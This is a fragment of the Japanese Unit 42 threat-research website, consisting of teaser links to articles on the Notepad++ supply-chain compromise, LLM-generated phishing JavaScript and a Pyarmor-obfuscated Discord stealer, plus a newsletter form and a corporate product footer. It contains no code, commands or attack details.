  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
